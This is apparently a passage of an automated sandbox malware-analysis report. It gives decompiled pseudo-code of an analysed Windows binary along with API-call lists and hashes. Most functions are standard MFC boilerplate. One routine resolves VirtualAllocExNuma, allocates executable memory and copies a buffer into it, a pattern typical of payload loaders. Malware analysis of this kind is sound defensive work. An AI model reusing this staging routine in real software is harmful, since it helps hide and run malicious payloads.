                                            					lstrcatA( &_v268, ".INI");
                                            					_t43 = E004065EE( &_v268);
                                            					 *((intOrPtr*)(_t64 + 0x90)) = _t43;
                                            					return _t43;
                                            				}
                                            				return _t39;
                                            			}

                                            APIs
                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 00426508
                                              • Part of subcall function 004265F4: lstrlenA.KERNEL32(00000104,00000000,?,00426538), ref: 0042662B
                                            • lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 004265A9
                                            • lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 004265D6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: FileModuleNamelstrcatlstrcpylstrlen
                                            • String ID: .HLP$.INI
                                            • API String ID: 2421895198-3011182340
                                            • Opcode ID: 03e9000f74707ee1fefe1168fab3d886596b8c1f978c46023b90c1e0bddbb18a
                                            • Instruction ID: 868c022bf07a7b2e93be295e1be440ce3fbd708987d9fcb65685db64fa447996
                                            • Opcode Fuzzy Hash: 03e9000f74707ee1fefe1168fab3d886596b8c1f978c46023b90c1e0bddbb18a
                                            • Instruction Fuzzy Hash: 31316071904718AFDB21DB75EC85B86B7FCAB04304F5049ABE18AD3141DB74AAC4CB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0041BA5F(intOrPtr __ecx, void* __eflags, CHAR* _a4, int _a8, intOrPtr _a12) {
                                            				struct HWND__* _v8;
                                            				int _v12;
                                            				struct HWND__* _v16;
                                            				intOrPtr _v20;
                                            				char _v280;
                                            				struct HWND__* _t23;
                                            				signed int _t32;
                                            				intOrPtr _t34;
                                            				long _t36;
                                            				int _t38;
                                            				intOrPtr _t41;
                                            				CHAR* _t42;
                                            				int _t43;
                                            				long _t44;
                                            
                                            				_t41 = __ecx;
                                            				_v20 = __ecx;
                                            				E0041BA31(0);
                                            				_t23 = E0041BBD7(0,  &_v8);
                                            				_t44 = 0;
                                            				_v16 = _t23;
                                            				if(_t23 == 0) {
                                            					L3:
                                            					if(_t41 != 0) {
                                            						_t5 = _t41 + 0x9c; // 0x9c
                                            						_t44 = _t5;
                                            					}
                                            					L5:
                                            					_v12 = 0;
                                            					if(_t44 != 0) {
                                            						_v12 =  *_t44;
                                            						_t34 = _a12;
                                            						if(_t34 != 0) {
                                            							 *_t44 = _t34 + 0x30000;
                                            						}
                                            					}
                                            					_t38 = _a8;
                                            					if((_t38 & 0x000000f0) == 0) {
                                            						_t32 = _t38 & 0x0000000f;
                                            						if(_t32 <= 1 || _t32 > 2 && _t32 <= 4) {
                                            							_t38 = _t38 | 0x00000030;
                                            						}
                                            					}
                                            					if(_t41 == 0) {
                                            						_t42 =  &_v280;
                                            						GetModuleFileNameA(0,  &_v280, 0x104);
                                            					} else {
                                            						_t42 =  *(_t41 + 0x78);
                                            					}
                                            					_t43 = MessageBoxA(_v16, _a4, _t42, _t38);
                                            					if(_t44 != 0) {
                                            						 *_t44 = _v12;
                                            					}
                                            					if(_v8 != 0) {
                                            						EnableWindow(_v8, 1);
                                            					}
                                            					E0041BA31(1);
                                            					return _t43;
                                            				}
                                            				_t36 = SendMessageA(_v8, 0x376, 0, 0);
                                            				if(_t36 == 0) {
                                            					goto L3;
                                            				} else {
                                            					_t44 = _t36;
                                            					goto L5;
                                            				}
                                            			}

                                            APIs
                                              • Part of subcall function 0041BBD7: GetParent.USER32(?), ref: 0041BC0A
                                              • Part of subcall function 0041BBD7: GetLastActivePopup.USER32(?), ref: 0041BC19
                                              • Part of subcall function 0041BBD7: IsWindowEnabled.USER32(?), ref: 0041BC2E
                                              • Part of subcall function 0041BBD7: EnableWindow.USER32(?,00000000), ref: 0041BC41
                                            • SendMessageA.USER32(?,00000376,00000000,00000000), ref: 0041BA95
                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 0041BB03
                                            • MessageBoxA.USER32 ref: 0041BB11
                                            • EnableWindow.USER32(00000000,00000001), ref: 0041BB2D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Window$EnableMessage$ActiveEnabledFileLastModuleNameParentPopupSend
                                            • String ID: ]hA
                                            • API String ID: 1958756768-937096280
                                            • Opcode ID: 7e6bfb6863a4bed41eb605bf4d3f71dc2d46af30f455a0b67583cfc665ecc676
                                            • Instruction ID: 4165363e149cbbf7c392989b56a322b27346b80c9b900e92cfd844e3d8e78dc3
                                            • Opcode Fuzzy Hash: 7e6bfb6863a4bed41eb605bf4d3f71dc2d46af30f455a0b67583cfc665ecc676
                                            • Instruction Fuzzy Hash: E1217E72A00208AFDB209FA5CCC1BEEB7B9EF44784F54046AE654E7250D7799D81CBE4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 83%
                                            			_entry_(void* __ebx, void* __edi, void* __esi) {
                                            				CHAR* _v8;
                                            				intOrPtr* _v24;
                                            				intOrPtr _v28;
                                            				struct _STARTUPINFOA _v96;
                                            				intOrPtr _v100;
                                            				intOrPtr _v104;
                                            				intOrPtr _v108;
                                            				unsigned int _t15;
                                            				signed int _t27;
                                            				signed int _t35;
                                            				intOrPtr _t52;
                                            
                                            				_t47 = __edi;
                                            				_push(0xffffffff);
                                            				_push(0x42f100);
                                            				_push(E00409800);
                                            				_push( *[fs:0x0]);
                                            				 *[fs:0x0] = _t52;
                                            				_push(__edi);
                                            				_v28 = _t52 - 0x58;
                                            				_t15 = GetVersion();
                                            				 *0x439d04 = 0;
                                            				_t35 = _t15 & 0x000000ff;
                                            				 *0x439d00 = _t35;
                                            				 *0x439cfc = _t35 << 8;
                                            				 *0x439cf8 = _t15 >> 0x10;
                                            				if(E0040796F(1) == 0) {
                                            					E004064B5(0x1c);
                                            				}
                                            				if(E00408DEC() == 0) {
                                            					E004064B5(0x10);
                                            				}
                                            				_v8 = 0;
                                            				E0040963B();
                                            				 *0x43b87c = GetCommandLineA();
                                            				 *0x439ce8 = E00409509();
                                            				E004092BC();
                                            				E00409203();
                                            				E00406619();
                                            				_v96.dwFlags = 0;
                                            				GetStartupInfoA( &_v96);
                                            				_v104 = E004091AB();
                                            				_t56 = _v96.dwFlags & 0x00000001;
                                            				if((_v96.dwFlags & 0x00000001) == 0) {
                                            					_t27 = 0xa;
                                            				} else {
                                            					_t27 = _v96.wShowWindow & 0x0000ffff;
                                            				}
                                            				_v100 = E0040EC99(GetModuleHandleA(0), 0, _v104, _t27);
                                            				E00406646(_t29);
                                            				_t31 = _v24;
                                            				_t40 =  *((intOrPtr*)( *_v24));
                                            				_v108 =  *((intOrPtr*)( *_v24));
                                            				return E00409033(_t47, _t56, _t40, _t31);
                                            			}















                                            APIs
                                            • GetVersion.KERNEL32 ref: 004063AE
                                              • Part of subcall function 0040796F: HeapCreate.KERNELBASE(00000000,00001000,00000000,004063E6,00000001), ref: 00407980
                                              • Part of subcall function 0040796F: HeapDestroy.KERNEL32 ref: 0040799E
                                            • GetCommandLineA.KERNEL32 ref: 0040640E
                                            • GetStartupInfoA.KERNEL32(?), ref: 00406439
                                            • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0040645C
                                              • Part of subcall function 004064B5: ExitProcess.KERNEL32 ref: 004064D2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                            • String ID: `3K
                                            • API String ID: 2057626494-2733895450
                                            • Opcode ID: 8203cef856ffdf5330fa23f021acb3231cccc4167ef851cc0875824ae4c609d5
                                            • Instruction ID: c51f859c3b4423f550283f3a037e6d2f417254e4b3c57e688e880ffcfc58db2c
                                            • Opcode Fuzzy Hash: 8203cef856ffdf5330fa23f021acb3231cccc4167ef851cc0875824ae4c609d5
                                            • Instruction Fuzzy Hash: 952174B1940715AAD718AFB6EC46A6D7BB8EF44704F10453FF902AA2D2DB7C4811CB9C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004219DB(intOrPtr* __ecx, int _a4, signed int _a8, intOrPtr _a12) {
                                            				void* __ebp;
                                            				void* _t29;
                                            				int _t30;
                                            				void* _t35;
                                            				void* _t38;
                                            				intOrPtr* _t40;
                                            				int _t42;
                                            				intOrPtr* _t45;
                                            				void* _t46;
                                            
                                            				_t45 = __ecx;
                                            				_t29 = E00414DCC(__ecx);
                                            				_t40 =  *((intOrPtr*)(_t45 + 0x68));
                                            				_t42 = _a4;
                                            				_t38 = _t29;
                                            				if(_t40 == 0) {
                                            					L2:
                                            					if(_a8 != 0xffff) {
                                            						if(_t42 == 0 || (_a8 & 0x00000810) != 0) {
                                            							 *(_t45 + 0x90) =  *(_t45 + 0x90) & 0x00000000;
                                            							goto L17;
                                            						} else {
                                            							if(_t42 < 0xf000 || _t42 >= 0xf1f0) {
                                            								if(_t42 < 0xff00) {
                                            									goto L13;
                                            								}
                                            								 *(_t45 + 0x90) = 0xef1f;
                                            								goto L17;
                                            							} else {
                                            								_t42 = (_t42 + 0xffff1000 >> 4) + 0xef00;
                                            								L13:
                                            								 *(_t45 + 0x90) = _t42;
                                            								L17:
                                            								 *(_t38 + 0x24) =  *(_t38 + 0x24) | 0x00000040;
                                            								L18:
                                            								_t30 =  *(_t45 + 0x90);
                                            								if(_t30 ==  *((intOrPtr*)(_t45 + 0x94))) {
                                            									L21:
                                            									return _t30;
                                            								}
                                            								_t30 = E00413740(_t46, GetParent( *(_t45 + 0x1c)));
                                            								if(_t30 == 0) {
                                            									goto L21;
                                            								}
                                            								return PostMessageA( *(_t45 + 0x1c), 0x36a, 0, 0);
                                            							}
                                            						}
                                            					}
                                            					 *(_t45 + 0x24) =  *(_t45 + 0x24) & 0xffffffbf;
                                            					if( *((intOrPtr*)(_t38 + 0x50)) != 0) {
                                            						 *(_t45 + 0x90) = 0xe002;
                                            					} else {
                                            						 *(_t45 + 0x90) = 0xe001;
                                            					}
                                            					SendMessageA( *(_t45 + 0x1c), 0x362,  *(_t45 + 0x90), 0);
                                            					_t35 =  *((intOrPtr*)( *_t45 + 0xd4))();
                                            					if(_t35 != 0) {
                                            						UpdateWindow( *(_t35 + 0x1c));
                                            					}
                                            					goto L18;
                                            				}
                                            				_t30 =  *((intOrPtr*)( *_t40 + 0x7c))(_t42, _a8, _a12);
                                            				if(_t30 != 0) {
                                            					goto L21;
                                            				}
                                            				goto L2;
                                            			}













                                            APIs
                                            • SendMessageA.USER32(?,00000362,0000E002,00000000), ref: 00421A41
                                            • UpdateWindow.USER32(?), ref: 00421A58
                                            • GetParent.USER32(?), ref: 00421AC3
                                            • PostMessageA.USER32 ref: 00421ADF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Message$ParentPostSendUpdateWindow
                                            • String ID: @
                                            • API String ID: 4141989945-2766056989
                                            • Opcode ID: a0883a40ade9d29dabb6438a6d982ec9dd02bf4ebcc6b520c58bc80ef48f8266
                                            • Instruction ID: c85c597f5e24639da506447a35e2af01adcbf593c53045394c0a427bdb2bd247
                                            • Opcode Fuzzy Hash: a0883a40ade9d29dabb6438a6d982ec9dd02bf4ebcc6b520c58bc80ef48f8266
                                            • Instruction Fuzzy Hash: 6931B131702711AFDB304F60E848B6B77B5BF60315F51493FE55A562B1C779A881DB08
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 80%
                                            			E00414364(int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                            				struct _WNDCLASSA _v44;
                                            				void* __ebp;
                                            				void* _t25;
                                            				void* _t34;
                                            				intOrPtr _t37;
                                            				struct HINSTANCE__* _t40;
                                            				CHAR* _t42;
                                            
                                            				_t42 = E004249C4() + 0x58;
                                            				_t25 = E00424BFB();
                                            				_t37 = _a8;
                                            				_t40 =  *(_t25 + 8);
                                            				if(_t37 != 0 || _a12 != _t37 || _a16 != _t37) {
                                            					wsprintfA(_t42, "Afx:%x:%x:%x:%x:%x", _t40, _a4, _t37, _a12, _a16);
                                            				} else {
                                            					wsprintfA(_t42, "Afx:%x:%x", _t40, _a4);
                                            				}
                                            				if(GetClassInfoA(_t40, _t42,  &_v44) == 0) {
                                            					_v44.style = _a4;
                                            					_v44.lpfnWndProc = DefWindowProcA;
                                            					_v44.cbWndExtra = 0;
                                            					_v44.cbClsExtra = 0;
                                            					_v44.lpszMenuName = 0;
                                            					_v44.hIcon = _a16;
                                            					_push( &_v44);
                                            					_v44.hInstance = _t40;
                                            					_v44.hCursor = _t37;
                                            					_v44.hbrBackground = _a12;
                                            					_v44.lpszClassName = _t42;
                                            					_t34 = E004142C3();
                                            					_t50 = _t34;
                                            					if(_t34 == 0) {
                                            						E0041A6C8(_t50);
                                            					}
                                            				}
                                            				return _t42;
                                            			}











                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: wsprintf$ClassInfo
                                            • String ID: Afx:%x:%x$Afx:%x:%x:%x:%x:%x
                                            • API String ID: 845911565-79760390
                                            • Opcode ID: e4d80fe6cbb09f3bee196ac69818de1da45527346801286afda017feaf06373e
                                            • Instruction ID: 0a19c2bbf351d913602cecefe87ed30b20bbc7f16e3ca44516e66fb3e2e9fa80
                                            • Opcode Fuzzy Hash: e4d80fe6cbb09f3bee196ac69818de1da45527346801286afda017feaf06373e
                                            • Instruction Fuzzy Hash: B3214271A0021DAF8F11EF95DC809DF7BB8EF48354B54402BF914E3251D3749A91CBA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00411BB7(void* __ecx, void* __eflags, struct HWND__** _a4) {
                                            				void* _t10;
                                            				void* _t11;
                                            				struct HWND__* _t13;
                                            				struct HWND__* _t16;
                                            				struct HWND__** _t23;
                                            				void* _t24;
                                            
                                            				_t23 = _a4;
                                            				_t24 = __ecx;
                                            				if(E00414007(__ecx, _t23) != 0) {
                                            					L12:
                                            					_t10 = 1;
                                            					return _t10;
                                            				}
                                            				_t11 = E00414DCC(__ecx);
                                            				if(_t11 == 0 ||  *((intOrPtr*)(_t11 + 0x50)) == 0) {
                                            					if(_t23[1] != 0x100) {
                                            						L13:
                                            						return E00415EEB(_t23);
                                            					}
                                            					_t13 = _t23[2];
                                            					if(_t13 == 0x1b || _t13 == 3) {
                                            						if((GetWindowLongA( *_t23, 0xfffffff0) & 0x00000004) == 0 || E0041A7A3( *_t23, ?str?) == 0) {
                                            							goto L13;
                                            						} else {
                                            							_t16 = GetDlgItem( *(_t24 + 0x1c), 2);
                                            							if(_t16 == 0 || IsWindowEnabled(_t16) != 0) {
                                            								SendMessageA( *(_t24 + 0x1c), 0x111, 2, 0);
                                            								goto L12;
                                            							} else {
                                            								goto L13;
                                            							}
                                            						}
                                            					} else {
                                            						goto L13;
                                            					}
                                            				} else {
                                            					return 0;
                                            				}
                                            			}










                                            APIs
                                            • GetWindowLongA.USER32 ref: 00411BF8
                                            • GetDlgItem.USER32 ref: 00411C17
                                            • IsWindowEnabled.USER32(00000000), ref: 00411C22
                                            • SendMessageA.USER32(?,00000111,00000002,00000000), ref: 00411C38
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Window$EnabledItemLongMessageSend
                                            • String ID: Edit
                                            • API String ID: 3499652902-554135844
                                            • Opcode ID: d2bf7d8cbc67d805becf9f5c6b39b18b476eb93c12fd4936ba7e19a4eada64a8
                                            • Instruction ID: 51c9d298f70c0f27378d29b3ac4567bc27d580c5dbc93a390a738e7f39d54beb
                                            • Opcode Fuzzy Hash: d2bf7d8cbc67d805becf9f5c6b39b18b476eb93c12fd4936ba7e19a4eada64a8
                                            • Instruction Fuzzy Hash: F701A1303486116AEA341B26DD09BEBA764DB80755F14442BF601D56F4EB68D9C2869C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 43%
                                            			E004012BE(intOrPtr _a4, intOrPtr _a8) {
                                            				struct HINSTANCE__* _v8;
                                            				struct HINSTANCE__* _v12;
                                            				struct HINSTANCE__** _t11;
                                            
                                            				_v12 = 0;
                                            				_v8 = 0;
                                            				_t11 =  &_v8;
                                            				_push(_t11);
                                            				_push("kernel32.dll");
                                            				_push(0);
                                            				L0040C36A();
                                            				if(_t11 != 0) {
                                            					 *0x437ca8 = GetProcAddress(_v8, "VirtualAllocExNuma");
                                            					_v12 =  *0x437ca8(GetCurrentProcess(), 0, _a8, 0x3000, 0x40, 0);
                                            					E00405700(_v12, _a4, _a8);
                                            				}
                                            				return _v12;
                                            			}







                                            APIs
                                            • GetModuleHandleExA.KERNEL32(00000000,kernel32.dll,00000000), ref: 004012DD
                                            • GetProcAddress.KERNEL32(00000000,VirtualAllocExNuma), ref: 004012EF
                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00003000,00000040,00000000), ref: 00401309
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: AddressCurrentHandleModuleProcProcess
                                            • String ID: VirtualAllocExNuma$kernel32.dll
                                            • API String ID: 4190356694-3151700105
                                            • Opcode ID: 4d1cfc9253b6b5733faca174fa102fb281a72f41be6bcaf77d063d5ced50d19a
                                            • Instruction ID: ab771110a78a71b3a50b1cedd4e9fcdb71e2ffac9dc1a6c26221fcdacf48f8c9
                                            • Opcode Fuzzy Hash: 4d1cfc9253b6b5733faca174fa102fb281a72f41be6bcaf77d063d5ced50d19a
                                            • Instruction Fuzzy Hash: C90136B5A40308BFDB10DFE4DC45F9E7BB8EB48715F509165FA04A72C0D7749A409BA8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 68%
                                            			E0041A2AB(void* __ecx, intOrPtr _a4) {
                                            				struct HINSTANCE__* _t4;
                                            				_Unknown_base(*)()* _t5;
                                            				void* _t9;
                                            				void* _t10;
                                            
                                            				_t10 = __ecx;
                                            				_t4 = GetModuleHandleA("GDI32.DLL");
                                            				_t9 = 0;
                                            				_t5 = GetProcAddress(_t4, "SetLayout");
                                            				if(_t5 == 0) {
                                            					if(_a4 != 0) {
                                            						_t9 = 0xffffffff;
                                            						SetLastError(0x78);
                                            					}
                                            				} else {
                                            					_t9 =  *_t5( *((intOrPtr*)(_t10 + 4)), _a4);
                                            				}
                                            				return _t9;
                                            			}

                                            APIs
                                            • GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,0041F6C9,00000000), ref: 0041A2B4
                                            • GetProcAddress.KERNEL32(00000000,SetLayout), ref: 0041A2C2
                                            • SetLastError.KERNEL32(00000078,?,?,0041F6C9,00000000), ref: 0041A2E4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: AddressErrorHandleLastModuleProc
                                            • String ID: GDI32.DLL$SetLayout
                                            • API String ID: 4275029093-2147214759
                                            • Opcode ID: d183b8fac5a71e79e7e75f7f8f27896d7713d41af84b50f8206dd60643ccb5a3
                                            • Instruction ID: 1037135d2ca6d5ab5d4448aeed59ef973abf2fe16e9a43a6574f43dcbb056aca
                                            • Opcode Fuzzy Hash: d183b8fac5a71e79e7e75f7f8f27896d7713d41af84b50f8206dd60643ccb5a3
                                            • Instruction Fuzzy Hash: D1E0D832701210FB82215719AC0895FBB52DBD4736BA98567F529C1290C7B9489286AE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 68%
                                            			E0041A275(signed int __ecx) {
                                            				_Unknown_base(*)()* _t3;
                                            				signed int _t7;
                                            				signed int _t8;
                                            
                                            				_t7 = __ecx;
                                            				_t3 = GetProcAddress(GetModuleHandleA("GDI32.DLL"), "GetLayout");
                                            				if(_t3 == 0) {
                                            					_t8 = _t7 | 0xffffffff;
                                            					SetLastError(0x78);
                                            				} else {
                                            					_t8 =  *_t3( *((intOrPtr*)(_t7 + 4)));
                                            				}
                                            				return _t8;
                                            			}

                                            APIs
                                            • GetModuleHandleA.KERNEL32(GDI32.DLL,?,0041F6BC), ref: 0041A27D
                                            • GetProcAddress.KERNEL32(00000000,GetLayout), ref: 0041A289
                                            • SetLastError.KERNEL32(00000078), ref: 0041A2A1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: AddressErrorHandleLastModuleProc
                                            • String ID: GDI32.DLL$GetLayout
                                            • API String ID: 4275029093-2396518106
                                            • Opcode ID: 9c85741f7edf57603d2f5ee7905b819242f56eff0a883d68a4b20df1af663ec8
                                            • Instruction ID: 1954eb6f5355677032b0495d8726e370a05d23e30929425976ce774bf1de63f4
                                            • Opcode Fuzzy Hash: 9c85741f7edf57603d2f5ee7905b819242f56eff0a883d68a4b20df1af663ec8
                                            • Instruction Fuzzy Hash: 38D05B31B42330EFC66027A4BD0D69A7B54DB08B6579502B7782ED22D0CBF85C4187ED
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 35%
                                            			E0041F691(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                            				intOrPtr _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr _v16;
                                            				char _v20;
                                            				intOrPtr _v24;
                                            				long _v28;
                                            				struct tagRECT _v44;
                                            				struct tagRECT _v60;
                                            				intOrPtr _t150;
                                            				intOrPtr* _t155;
                                            				intOrPtr _t161;
                                            				void* _t162;
                                            				signed int _t165;
                                            				signed int _t167;
                                            				signed int _t171;
                                            				signed int _t173;
                                            				long _t191;
                                            				intOrPtr* _t198;
                                            				intOrPtr* _t200;
                                            				long _t202;
                                            				intOrPtr* _t209;
                                            				intOrPtr* _t211;
                                            				intOrPtr* _t214;
                                            				long _t216;
                                            				void* _t219;
                                            				signed char _t222;
                                            				intOrPtr _t225;
                                            				intOrPtr _t236;
                                            				intOrPtr _t242;
                                            				char* _t248;
                                            				struct tagRECT* _t263;
                                            				intOrPtr* _t279;
                                            				signed int _t281;
                                            				long _t283;
                                            				void* _t287;
                                            				intOrPtr _t291;
                                            				intOrPtr _t308;
                                            
                                            				_t219 = __ecx;
                                            				 *((intOrPtr*)(__ecx + 0x88)) = 1;
                                            				E0041FF70(__ecx);
                                            				_t279 = __ecx + 0x84;
                                            				if((E0041A275( *((intOrPtr*)(__ecx + 0x84))) & 0x00000001) != 0) {
                                            					E0041A2AB( *_t279, 0);
                                            				}
                                            				_t150 =  *((intOrPtr*)(_t219 + 0x68));
                                            				_t222 =  *(_t150 + 0x64);
                                            				if((_t222 & 0x00000004) == 0) {
                                            					if((_t222 & 0x00000002) == 0) {
                                            						GetWindowRect( *(_t150 + 0x1c),  &_v44);
                                            						_t281 =  *(_t219 + 0x78) & 0x0000a000;
                                            						 *((intOrPtr*)(_t219 + 4)) = _a4;
                                            						asm("sbb edx, edx");
                                            						 *((intOrPtr*)(_t219 + 8)) = _a8;
                                            						_t248 =  &_v20;
                                            						_t155 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))(_t248, 0xffffffff, ( ~_t281 & 0x00000006) + 0xa);
                                            						_t225 =  *_t155;
                                            						_v8 =  *((intOrPtr*)(_t155 + 4));
                                            						if(_t281 == 0) {
                                            							asm("movsd");
                                            							asm("movsd");
                                            							asm("movsd");
                                            							asm("movsd");
                                            							_t283 = _v44.left;
                                            							asm("cdq");
                                            							_v20 = _t225 + _t283;
                                            							_v28 = _t283;
                                            							_t250 = _v44.right - _t283 - _t248 >> 1;
                                            							_t161 = _a8 - (_v44.right - _t283 - _t248 >> 1);
                                            							_v24 = _t161;
                                            							_v16 = _v8 + _t161;
                                            						} else {
                                            							asm("movsd");
                                            							asm("movsd");
                                            							asm("movsd");
                                            							asm("movsd");
                                            							_t291 = _v44.top;
                                            							_v24 = _t291;
                                            							asm("cdq");
                                            							_t250 = _v44.bottom - _t291 - _t248 >> 1;
                                            							_t191 = _a4 - (_v44.bottom - _t291 - _t248 >> 1);
                                            							_v28 = _t191;
                                            							_v20 = _t225 + _t191;
                                            							_v16 = _v8 + _t291;
                                            						}
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						_t162 = _t219 + 0x48;
                                            						_push(0);
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
